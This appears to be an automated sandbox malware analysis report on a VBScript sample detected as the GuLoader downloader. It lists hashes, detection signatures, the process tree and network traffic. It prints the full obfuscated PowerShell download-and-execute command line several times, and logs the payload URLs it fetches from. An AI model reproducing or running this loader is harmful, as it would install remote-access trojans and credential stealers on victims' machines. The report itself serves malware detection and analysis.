
Windows Analysis Report
S1a5ZF3ytp.vbs

Overview

General Information

Sample name: S1a5ZF3ytp.vbs (renamed because the original name is a hash value)
Original sample name: 3f18b6b6686858e2d1707d38224c41129329efae694b883ac1cffa7617e30568.vbs
Analysis ID: 1571032
MD5: 1a749c44eb48b9cdddcdd8e00a6bd866
SHA1: 555ed2c58801e005bba67f38174006eb1a1ff31d
SHA256: 3f18b6b6686858e2d1707d38224c41129329efae694b883ac1cffa7617e30568
Tags: 185-236-228-92, vbs, user-JAMESWT_MHT

Detection

GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
VBScript performs obfuscated calls to suspicious functions
Yara detected GuLoader
Yara detected Powershell download and execute
AI detected suspicious sample
Found suspicious powershell code related to unpacking or dynamic code loading
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Wscript starts Powershell (via cmd or directly)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match

Classification

  • System is w10x64
  • wscript.exe (PID: 6548 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\S1a5ZF3ytp.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • WMIC.exe (PID: 4600 cmdline: wmic diskdrive get caption,serialnumber MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • conhost.exe (PID: 3992 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 1732 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ";$Polars229='Afkvistning158';;$Navier='kompetencegivende';;$Ndudgangen9='semipreserved';;$Straalepletten='Knaldgassen';;$Forhales=$host.Name;function Tilbageholdte($Satirisation){If ($Forhales) {$Nonanarchically=2} for ($Jurywoman=$Nonanarchically;;$Jurywoman+=3){if(!$Satirisation[$Jurywoman]){cls;break }$Halomancy+=$Satirisation[$Jurywoman];$Hiveward='Schweizerostens'}$Halomancy}function Containeriseringers($Taltes213){ .($Murage) ($Taltes213)}$Plagen=Tilbageholdte ' SNRee gt c. Uw';$Plagen+=Tilbageholdte ' ae aB.lC.ulE i EeSiN at';$Moonscape=Tilbageholdte 'B,MCoo,tz,hi Sl,al Cao /';$elegiker=Tilbageholdte ' aT TlFlsto1Fo2';$Ungeneral='Ar[T.npuEM TM .BiSDuE rFeV ITrc oEPaP.poNaISunIstS.MRiAAmNBua nGHaESdr M]Kn:So:StsC eSeCFaU yr aI utA,y RpAlrMaoU t OKoCKootaL,u=Pe$ eEB.lS eFlg OiOmK BeBir';$Moonscape+=Tilbageholdte 'Mo5Gu. u0La G( LW viKrnT d oKawCosVi O.NHeTRe i1Ae0 r.Ap0Sl;st ,eW Si .nH 6Bo4Dr; u ,ix i6 H4O,;Ke Lur RvA :Pi1L 3Fo1Va.Bu0Ab) d ,GBae cDekHao /tr2Va0Re1E.0an0 M1As0Ne1 L TiFSei MrNeeSef CoDrx o/R 1Cy3 T1.o.So0';$Retransform=Tilbageholdte ' FUT sC,eTeris-skA ag,eeRen Ct';$Automatteoriens=Tilbageholdte 'RuhSath.tSpp jsE :Qu/ e/T w Tw OwKr. vfVitGasMae n gKriS nTreSte rL.sTr. Ac RoT.mF /RekSpmG./RemLyimecNarP.oHocOvhTheDri SlReiW a L.Sid Kw.rp Q> jh lt It.opEvsFo:hy/ e/N w CwSkwfu. opAfu bn eS.e itfa.Tra eesl/HykRumGa/ vmE,iHuc CrSmoG cDrh .e HiPalK iWaaC,. 
rd w op';$Sterne=Tilbageholdte 'Bi>';$Murage=Tilbageholdte 'BeiEaEFrX';$Svejsemestre='Teddybjrnenes';$Groteskes='\bethink.Sal';Containeriseringers (Tilbageholdte 'K.$FogUdl iO.eBRoA,mlk,:SeeCaN HERiB rrH rChi SCuEDiNAleH SSa=Af$ .EflnTrv I: Fa uPAnp D.eAMet aKr+S,$Kng cR,doK tRuE oSReK E.as');Containeriseringers (Tilbageholdte 'Sc$Ovg .LTho ,b EAVrlSa:VilUnA,nGRer CI.rn.pg SsArFBlO TRS M .3Re7Go=E $ .A.juFlt O oM hA eTLaT.oeThoc R PiSpeFoN rS A.KlsN pUnL ri STHo(Sl$PesJeT EArRG N yEMu)');Containeriseringers (Tilbageholdte $Ungeneral);$Automatteoriens=$Lagringsform37[0];$Bygders=(Tilbageholdte ' P$brgT lS O Sb.uAC L : PbAmIS,RSkGBoiSpTQuTH iHjN MERarFrE BnSks .=F.NFieF wSt-SmoPeBGyj BeHocK,T US.nyJoSStt GER M K.l $Sap DlBiaL.g eCoN');Containeriseringers ($Bygders);Containeriseringers (Tilbageholdte '.o$PrBPeiCorD gPri FtJ.t .i Sn heSorEreannKus i.OrHudeAraMid,eeRarKosCa[Po$StRHeeG.tSar Oa,inSrsShfK.oF rPrmS ]Fa=Gr$JeMSto EoOvnPas,dcKua gpSie');$Netmave=Tilbageholdte ' S$ .BGoiF.rReg,ai at Dt si ,nn e MrS eHjns,s . 
.DBooFlwB nudl OoLraPedcaFB itrlc e H(Dr$AaA au NtProUnmSeaMittotS eDioKor iReeAnnA,sri, $ VIHunMadDioIrpAth yeOrnUni CnEp)';$Indophenin=$Enebrrisenes;Containeriseringers (Tilbageholdte 'T $,nGM.lstOFeB cA.oL E:InI dnFuGGoET f MR DM iAB.RSpmCoEf LAfaB DGeE o= F(.yt Ee aSBat f-AtP,aa ,t ah i y$UnI KnChd .O ,pUnHUdE ,n Ki ,nBe)');while (!$Ingefrmarmelade) {Containeriseringers (Tilbageholdte ' e$ ig slBuoBrbSpa AlBl:M DfieDonNonLoiUnsBusmo=Se$FoTreoA k.eo tmTrpUmoT.nPaeBenVktEne es') ;Containeriseringers $Netmave;Containeriseringers (Tilbageholdte ' ,sSaTFaaAvRUftTi- s gl.aEPeeBiPPl oo4');Containeriseringers (Tilbageholdte 'Ud$ aGRiL .oNabTyA olAn:BeI NnUrGd Eb f eR SMVgA prB mutE,el,oa DDiEB =K.(G TOmESkSbrt .- apBrA iTQuh , ,$ dIslN BDVao rpLyhOxeP nw iPln u)') ;Containeriseringers (Tilbageholdte 'F.$AfgPelCloL bSpaS,LE :LoFP,oBor HfA jU,ETir SDG iGuNS,GAce arBa=Gr$JyG olCooA b .ALvLM : oPWao SI GnFiTD,w.eaG yStS ,+ X+ e%I $HoLPra GG dRM iPoN uGTes.rF WO hrunMB 3 l7Wo.UnC lOKnUUfn Kt') ;$Automatteoriens=$Lagringsform37[$Forfjerdinger]}$Agrees=317274;$Unanalytic=28672;Containeriseringers (Tilbageholdte 'W $GaGStlTeo rbMyA.il n:,dS atPrRVeA AIEjnDiS . Un=,c TgFeEC T c-,oC TO,aN,aTSeeToN .TYa Ve$PaIFiN PDTrO UpS H ESknHyIEnN');Containeriseringers (Tilbageholdte 'Ra$ cgLil aoStbm a DlBa:Unl CuOvfVbtDuaScn,egSur e UbSesRe i= F C [EkS yT.sFitSleVamAf.DiCBeo Un vF.e MrRytW ]Un:Fe:D FTor aoP,m,eBK,aThs Cepl6Pl4.rSdit TrW,iSunuogS (,k$ iSBatWrr aGriHenS s B)');Containeriseringers (Tilbageholdte 'On$ AgEvLFoOTrbHea lSu: eT nS,oPlm ,A BNIrI oa,a El= S N [.rS oyCos itStEEvMMi.,rT peunXBlT f.n ECaN c Go ADScISpN.ogPi]In:H.:Spa Rs CCStiOciEm.IngdiEIsTI sSutParAniklnReGun(Uf$OvLPruVoF AtAmapanTaGYarNge ibIdS ,)');Containeriseringers (Tilbageholdte ' I$ OGUnlPaOTibA a AlEk:F a ocHaOOpRS N ,S.k= S$KieRun ,O SM,pa Ln II ha s.MosS,UReb SVatBaRVai Dn Ug,a(Mo$ oaGaG,rr OEMuE.is , B$S U nkuAHan SaStLS y LTDeiFoCB,)');Containeriseringers $Acorns;" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 2316 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • powershell.exe (PID: 6640 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" ";$Polars229='Afkvistning158';;$Navier='kompetencegivende';;$Ndudgangen9='semipreserved';;$Straalepletten='Knaldgassen';;$Forhales=$host.Name;function Tilbageholdte($Satirisation){If ($Forhales) {$Nonanarchically=2} for ($Jurywoman=$Nonanarchically;;$Jurywoman+=3){if(!$Satirisation[$Jurywoman]){cls;break }$Halomancy+=$Satirisation[$Jurywoman];$Hiveward='Schweizerostens'}$Halomancy}function Containeriseringers($Taltes213){ .($Murage) ($Taltes213)}$Plagen=Tilbageholdte ' SNRee gt c. Uw';$Plagen+=Tilbageholdte ' ae aB.lC.ulE i EeSiN at';$Moonscape=Tilbageholdte 'B,MCoo,tz,hi Sl,al Cao /';$elegiker=Tilbageholdte ' aT TlFlsto1Fo2';$Ungeneral='Ar[T.npuEM TM .BiSDuE rFeV ITrc oEPaP.poNaISunIstS.MRiAAmNBua nGHaESdr M]Kn:So:StsC eSeCFaU yr aI utA,y RpAlrMaoU t OKoCKootaL,u=Pe$ eEB.lS eFlg OiOmK BeBir';$Moonscape+=Tilbageholdte 'Mo5Gu. u0La G( LW viKrnT d oKawCosVi O.NHeTRe i1Ae0 r.Ap0Sl;st ,eW Si .nH 6Bo4Dr; u ,ix i6 H4O,;Ke Lur RvA :Pi1L 3Fo1Va.Bu0Ab) d ,GBae cDekHao /tr2Va0Re1E.0an0 M1As0Ne1 L TiFSei MrNeeSef CoDrx o/R 1Cy3 T1.o.So0';$Retransform=Tilbageholdte ' FUT sC,eTeris-skA ag,eeRen Ct';$Automatteoriens=Tilbageholdte 'RuhSath.tSpp jsE :Qu/ e/T w Tw OwKr. vfVitGasMae n gKriS nTreSte rL.sTr. Ac RoT.mF /RekSpmG./RemLyimecNarP.oHocOvhTheDri SlReiW a L.Sid Kw.rp Q> jh lt It.opEvsFo:hy/ e/N w CwSkwfu. opAfu bn eS.e itfa.Tra eesl/HykRumGa/ vmE,iHuc CrSmoG cDrh .e HiPalK iWaaC,. 
rd w op';$Sterne=Tilbageholdte 'Bi>';$Murage=Tilbageholdte 'BeiEaEFrX';$Svejsemestre='Teddybjrnenes';$Groteskes='\bethink.Sal';Containeriseringers (Tilbageholdte 'K.$FogUdl iO.eBRoA,mlk,:SeeCaN HERiB rrH rChi SCuEDiNAleH SSa=Af$ .EflnTrv I: Fa uPAnp D.eAMet aKr+S,$Kng cR,doK tRuE oSReK E.as');Containeriseringers (Tilbageholdte 'Sc$Ovg .LTho ,b EAVrlSa:VilUnA,nGRer CI.rn.pg SsArFBlO TRS M .3Re7Go=E $ .A.juFlt O oM hA eTLaT.oeThoc R PiSpeFoN rS A.KlsN pUnL ri STHo(Sl$PesJeT EArRG N yEMu)');Containeriseringers (Tilbageholdte $Ungeneral);$Automatteoriens=$Lagringsform37[0];$Bygders=(Tilbageholdte ' P$brgT lS O Sb.uAC L : PbAmIS,RSkGBoiSpTQuTH iHjN MERarFrE BnSks .=F.NFieF wSt-SmoPeBGyj BeHocK,T US.nyJoSStt GER M K.l $Sap DlBiaL.g eCoN');Containeriseringers ($Bygders);Containeriseringers (Tilbageholdte '.o$PrBPeiCorD gPri FtJ.t .i Sn heSorEreannKus i.OrHudeAraMid,eeRarKosCa[Po$StRHeeG.tSar Oa,inSrsShfK.oF rPrmS ]Fa=Gr$JeMSto EoOvnPas,dcKua gpSie');$Netmave=Tilbageholdte ' S$ .BGoiF.rReg,ai at Dt si ,nn e MrS eHjns,s . 
.DBooFlwB nudl OoLraPedcaFB itrlc e H(Dr$AaA au NtProUnmSeaMittotS eDioKor iReeAnnA,sri, $ VIHunMadDioIrpAth yeOrnUni CnEp)';$Indophenin=$Enebrrisenes;Containeriseringers (Tilbageholdte 'T $,nGM.lstOFeB cA.oL E:InI dnFuGGoET f MR DM iAB.RSpmCoEf LAfaB DGeE o= F(.yt Ee aSBat f-AtP,aa ,t ah i y$UnI KnChd .O ,pUnHUdE ,n Ki ,nBe)');while (!$Ingefrmarmelade) {Containeriseringers (Tilbageholdte ' e$ ig slBuoBrbSpa AlBl:M DfieDonNonLoiUnsBusmo=Se$FoTreoA k.eo tmTrpUmoT.nPaeBenVktEne es') ;Containeriseringers $Netmave;Containeriseringers (Tilbageholdte ' ,sSaTFaaAvRUftTi- s gl.aEPeeBiPPl oo4');Containeriseringers (Tilbageholdte 'Ud$ aGRiL .oNabTyA olAn:BeI NnUrGd Eb f eR SMVgA prB mutE,el,oa DDiEB =K.(G TOmESkSbrt .- apBrA iTQuh , ,$ dIslN BDVao rpLyhOxeP nw iPln u)') ;Containeriseringers (Tilbageholdte 'F.$AfgPelCloL bSpaS,LE :LoFP,oBor HfA jU,ETir SDG iGuNS,GAce arBa=Gr$JyG olCooA b .ALvLM : oPWao SI GnFiTD,w.eaG yStS ,+ X+ e%I $HoLPra GG dRM iPoN uGTes.rF WO hrunMB 3 l7Wo.UnC lOKnUUfn Kt') ;$Automatteoriens=$Lagringsform37[$Forfjerdinger]}$Agrees=317274;$Unanalytic=28672;Containeriseringers (Tilbageholdte 'W $GaGStlTeo rbMyA.il n:,dS atPrRVeA AIEjnDiS . Un=,c TgFeEC T c-,oC TO,aN,aTSeeToN .TYa Ve$PaIFiN PDTrO UpS H ESknHyIEnN');Containeriseringers (Tilbageholdte 'Ra$ cgLil aoStbm a DlBa:Unl CuOvfVbtDuaScn,egSur e UbSesRe i= F C [EkS yT.sFitSleVamAf.DiCBeo Un vF.e MrRytW ]Un:Fe:D FTor aoP,m,eBK,aThs Cepl6Pl4.rSdit TrW,iSunuogS (,k$ iSBatWrr aGriHenS s B)');Containeriseringers (Tilbageholdte 'On$ AgEvLFoOTrbHea lSu: eT nS,oPlm ,A BNIrI oa,a El= S N [.rS oyCos itStEEvMMi.,rT peunXBlT f.n ECaN c Go ADScISpN.ogPi]In:H.:Spa Rs CCStiOciEm.IngdiEIsTI sSutParAniklnReGun(Uf$OvLPruVoF AtAmapanTaGYarNge ibIdS ,)');Containeriseringers (Tilbageholdte ' I$ OGUnlPaOTibA a AlEk:F a ocHaOOpRS N ,S.k= S$KieRun ,O SM,pa Ln II ha s.MosS,UReb SVatBaRVai Dn Ug,a(Mo$ oaGaG,rr OEMuE.is , B$S U nkuAHan SaStLS y LTDeiFoCB,)');Containeriseringers $Acorns;" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
    • conhost.exe (PID: 6644 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
Name: CloudEyE, GuLoader
Description: CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.
Attribution: No Attribution
Blogpost URLs: none
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
No configs have been found
Source: 00000006.00000002.2982475542.0000000005748000.00000004.00000800.00020000.00000000.sdmp | Rule: JoeSecurity_GuLoader_5 | Description: Yara detected GuLoader | Author: Joe Security
Source: 00000003.00000002.1874103061.0000021AA9260000.00000004.00000800.00020000.00000000.sdmp | Rule: JoeSecurity_GuLoader_5 | Description: Yara detected GuLoader | Author: Joe Security
Source: Process Memory Space: powershell.exe PID: 1732 | Rule: JoeSecurity_PowershellDownloadAndExecute | Description: Yara detected Powershell download and execute | Author: Joe Security
Source: Process Memory Space: powershell.exe PID: 1732 | Rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Description: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | Author: ditekSHen | Strings:
        • 0x1924f0:$b2: ::FromBase64String(
        • 0x22cd87:$b2: ::FromBase64String(
        • 0x22cdc2:$b2: ::FromBase64String(
        • 0x22cdfe:$b2: ::FromBase64String(
        • 0x22ce3b:$b2: ::FromBase64String(
        • 0x22ce79:$b2: ::FromBase64String(
        • 0x22ceb8:$b2: ::FromBase64String(
        • 0x22cef8:$b2: ::FromBase64String(
        • 0x22cf39:$b2: ::FromBase64String(
        • 0x22cf7b:$b2: ::FromBase64String(
        • 0x22cfbe:$b2: ::FromBase64String(
        • 0x2194b:$s1: -join
        • 0x30113:$s1: -join
        • 0xdab30:$s1: -join
        • 0xdf9e3:$s1: -join
        • 0x13a6ac:$s1: -join
        • 0x13ae0c:$s1: -join
        • 0x2d5dd9:$s1: -join
        • 0x2e2eae:$s1: -join
        • 0x2e6280:$s1: -join
        • 0x2e6932:$s1: -join
Source: Process Memory Space: powershell.exe PID: 6640 | Rule: JoeSecurity_PowershellDownloadAndExecute | Description: Yara detected Powershell download and execute | Author: Joe Security

Source: amsi64_1732.amsi.csv | Rule: JoeSecurity_PowershellDownloadAndExecute | Description: Yara detected Powershell download and execute | Author: Joe Security
Source: amsi32_6640.amsi.csv | Rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Description: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | Author: ditekSHen | Strings:
            • 0xbf0d:$b2: ::FromBase64String(
            • 0xafa0:$s1: -join
            • 0x474c:$s4: +=
            • 0x480e:$s4: +=
            • 0x8a35:$s4: +=
            • 0xab52:$s4: +=
            • 0xae3c:$s4: +=
            • 0xaf82:$s4: +=
            • 0x148b2:$s4: +=
            • 0x14932:$s4: +=
            • 0x149f8:$s4: +=
            • 0x14a78:$s4: +=
            • 0x14c4e:$s4: +=
            • 0x14cd2:$s4: +=
            • 0xb7b5:$e4: Get-WmiObject
            • 0xb9a4:$e4: Get-Process
            • 0xb9fc:$e4: Start-Process

            System Summary

            Source: Process started | Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community | Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\S1a5ZF3ytp.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\S1a5ZF3ytp.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\S1a5ZF3ytp.vbs", ProcessId: 6548, ProcessName: wscript.exe
            Source: Process started | Author: Michael Haag | Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\S1a5ZF3ytp.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\S1a5ZF3ytp.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\S1a5ZF3ytp.vbs", ProcessId: 6548, ProcessName: wscript.exe
            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ";$Polars229='Afkvistning158';;$Navier='kompetencegivende';;$Ndudgangen9='semipreserved';;$Straalepletten='Knaldgassen';;$Forhales=$host.Name;function Tilbageholdte($Satirisation){If ($Forhales) {$Nonanarchically=2} for ($Jurywoman=$Nonanarchically;;$Jurywoman+=3){if(!$Satirisation[$Jurywoman]){cls;break }$Halomancy+=$Satirisation[$Jurywoman];$Hiveward='Schweizerostens'}$Halomancy}function Containeriseringers($Taltes213){ .($Murage) ($Taltes213)}$Plagen=Tilbageholdte ' SNRee gt c. Uw';$Plagen+=Tilbageholdte ' ae aB.lC.ulE i EeSiN at';$Moonscape=Tilbageholdte 'B,MCoo,tz,hi Sl,al Cao /';$elegiker=Tilbageholdte ' aT TlFlsto1Fo2';$Ungeneral='Ar[T.npuEM TM .BiSDuE rFeV ITrc oEPaP.poNaISunIstS.MRiAAmNBua nGHaESdr M]Kn:So:StsC eSeCFaU yr aI utA,y RpAlrMaoU t OKoCKootaL,u=Pe$ eEB.lS eFlg OiOmK BeBir';$Moonscape+=Tilbageholdte 'Mo5Gu. u0La G( LW viKrnT d oKawCosVi O.NHeTRe i1Ae0 r.Ap0Sl;st ,eW Si .nH 6Bo4Dr; u ,ix i6 H4O,;Ke Lur RvA :Pi1L 3Fo1Va.Bu0Ab) d ,GBae cDekHao /tr2Va0Re1E.0an0 M1As0Ne1 L TiFSei MrNeeSef CoDrx o/R 1Cy3 T1.o.So0';$Retransform=Tilbageholdte ' FUT sC,eTeris-skA ag,eeRen Ct';$Automatteoriens=Tilbageholdte 'RuhSath.tSpp jsE :Qu/ e/T w Tw OwKr. vfVitGasMae n gKriS nTreSte rL.sTr. Ac RoT.mF /RekSpmG./RemLyimecNarP.oHocOvhTheDri SlReiW a L.Sid Kw.rp Q> jh lt It.opEvsFo:hy/ e/N w CwSkwfu. opAfu bn eS.e itfa.Tra eesl/HykRumGa/ vmE,iHuc CrSmoG cDrh .e HiPalK iWaaC,. 
rd w op';$Sterne=Tilbageholdte 'Bi>';$Murage=Tilbageholdte 'BeiEaEFrX';$Svejsemestre='Teddybjrnenes';$Groteskes='\bethink.Sal';Containeriseringers (Tilbageholdte 'K.$FogUdl iO.eBRoA,mlk,:SeeCaN HERiB rrH rChi SCuEDiNAleH SSa=Af$ .EflnTrv I: Fa uPAnp D.eAMet aKr+S,$Kng cR,doK tRuE oSReK E.as');Containeriseringers (Tilbageholdte 'Sc$Ovg .LTho ,b EAVrlSa:VilUnA,nGRer CI.rn.pg SsArFBlO TRS M .3Re7Go=E $ .A.juFlt O oM hA eTLaT.oeThoc R PiSpeFoN rS A.KlsN pUnL ri STHo(Sl$PesJeT EArRG N yEMu)');Containeriseringers (Tilbageholdte $Ungeneral);$Automatteoriens=$Lagringsform37[0];$Bygders=(Tilbageholdte ' P$brgT lS O Sb.uAC L : PbAmIS,RSkGBoiSpTQuTH iHjN MERarFrE BnSks .=F.NFieF wSt-SmoPeBGyj BeHocK,T US.nyJoSStt GER M K.l $Sap DlBiaL.g eCoN');Containeriseringers ($Bygders);Containeriseringers (Tilbageholdte '.o$PrBPeiCorD gPri FtJ.t .i Sn heSorEreannKus i.OrHudeAraMid,eeRarKosCa[Po$StRHeeG.tSar Oa,inSrsShfK.oF rPrmS ]Fa=Gr$JeMSto EoOvnPas,dcKua gpSie');$Netmave=Tilbageholdte ' S$ .BGoiF.rReg,ai at Dt si ,nn e MrS eHjns,s . .DBooFlwB nudl OoLraPedcaFB itrlc e H(Dr$AaA au NtProUnmSeaMittotS eDioKor iReeAnnA,sri, $ VIHunMadDioIrpAth yeOrnUni CnEp)';$Indophenin=$Enebrrisenes;Containeriseringers (Tilbageholdte 'T $,nGM.lstOFeB cA.oL E:InI dnFuGGoET f MR DM iAB.RSpmCoEf LAfaB DGeE o= F(.yt Ee aSBat f-AtP,aa ,t ah i y$UnI KnChd .O ,pUnHUdE ,n Ki ,nBe)');while (!$Ingefrmarmelade) {Containeriseringers (Tilbageholdte ' e$ ig slBuoBrbSpa AlBl:M DfieDonNonLoiUnsBusmo=Se$FoTreoA k.eo tmTrpUmoT.nPaeBenVktEne es') ;Containeriserin
            No Suricata rule has matched

            AV Detection

            Source: Submitted sample | Integrated Neural Analysis Model: matched 99.5% probability
            Source: unknown | HTTPS traffic detected: 103.53.42.63:443 -> 192.168.2.4:49731 version: TLS 1.2
            Source: Binary string: ystem.Core.pdb source: powershell.exe, 00000006.00000002.2992466321.00000000080D0000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000006.00000002.2968789365.0000000002CBE000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Core.pdb source: powershell.exe, 00000006.00000002.2968789365.0000000002CBE000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000006.00000002.2992466321.00000000080E8000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb. source: powershell.exe, 00000006.00000002.2992466321.00000000080E8000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Core.pdbk source: powershell.exe, 00000006.00000002.2968789365.0000000002CBE000.00000004.00000020.00020000.00000000.sdmp

            Software Vulnerabilities

            Source: C:\Windows\System32\wscript.exe | Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            Source: Joe Sandbox View | IP Address: 103.53.42.63 103.53.42.63
            Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
            Source: global traffic | HTTP traffic detected: GET /km/microcheilia.dwp HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 | Host: www.ftsengineers.com | Connection: Keep-Alive
            Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global traffic | HTTP traffic detected: GET /km/microcheilia.dwp HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 | Host: www.ftsengineers.com | Connection: Keep-Alive
            Source: global traffic | DNS traffic detected: DNS query: www.ftsengineers.com
            Source: powershell.exe, 00000006.00000002.2988349216.000000000732E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.micro_
            Source: wscript.exe, 00000000.00000003.1701929531.000002343AD5F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1704814905.000002343AD6D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1703993978.000002343AD6D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1703713164.000002343AD6D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1692452905.000002343CCE7000.00000004.00000020.00020000.00000000.sdmp, 77EC63BDA74BD0D0E0426DC8F80085060.0.dr | String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
            Source: wscript.exe, 00000000.00000003.1693005129.000002343ADE3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1692939516.000002343ADBC000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?69b703ed3a0b2
            Source: wscript.exe, 00000000.00000003.1703830322.000002343AD4E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1704797095.000002343AD5D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1704425867.000002343AD4F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1704449375.000002343AD5B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/engramDataAU
            Source: wscript.exe, 00000000.00000003.1693005129.000002343ADE3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1692939516.000002343ADBC000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ctldl.windowsupdate.com:80/msdownload/update/v3/static/trustedr/en/authrootstl.cab?69b703ed3a
            Source: powershell.exe, 00000003.00000002.1849596951.0000021A9AFD9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ftsengineers.com
            Source: powershell.exe, 00000003.00000002.1874103061.0000021AA9260000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2982475542.0000000005748000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
            Source: powershell.exe, 00000006.00000002.2970700817.0000000004835000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2968789365.0000000002CBE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
            Source: powershell.exe, 00000003.00000002.1849596951.0000021A991F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2970700817.00000000046E1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: powershell.exe, 00000006.00000002.2970700817.0000000004835000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2968789365.0000000002CBE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
